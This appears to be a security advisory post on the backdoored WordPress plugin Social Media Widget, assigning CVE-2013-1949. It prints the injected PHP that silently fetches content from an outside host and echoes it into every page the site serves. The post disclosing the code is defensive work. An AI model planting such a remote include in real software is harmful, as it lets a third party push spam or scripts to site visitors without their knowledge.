http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html
http://securityledger.com/hacked-wordpress-plug-in-put-on-double-secret-probation/
http://it.slashdot.org/story/13/04/13/212226/popular-wordpress-plug-in-caught-spamming-is-put-on-probation
So the company responsible for Social Media Widget claims that a rogue
developer they contracted inserted this code:
470
471 $smw_url = "hxxp://i.aaur.net/i.php";
472 if(!function_exists("smw_get")){
473 function smw_get($f) {
474 $response = wp_remote_get( $f );
475 if( is_wp_error( $response ) ) {
476 function smw_get_body($f) {
477 $ch = @curl_init();
478 @curl_setopt($ch, CURLOPT_URL, $f);
479 @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
480 $output = @curl_exec($ch);
481 @curl_close($ch);
482 return $output;
483 }
484 echo smw_get_body($f);
485 } else {
486 echo $response["body"];
487 }
488 }
489 smw_get($smw_url);
490 }
Regardless of HOW this code got into the plugin it represents a
significant security issue. Any site using this plugin is pulling
"hxxp://i.aaur.net/i.php" and including it in the page they generate
and send to a user. This opens up a huge can of worms, anyone that can
man in the middle your server can now inject PHP into your blog, ot
anything sent to the clients/etc.
Please use CVE-2013-1949 for this issue.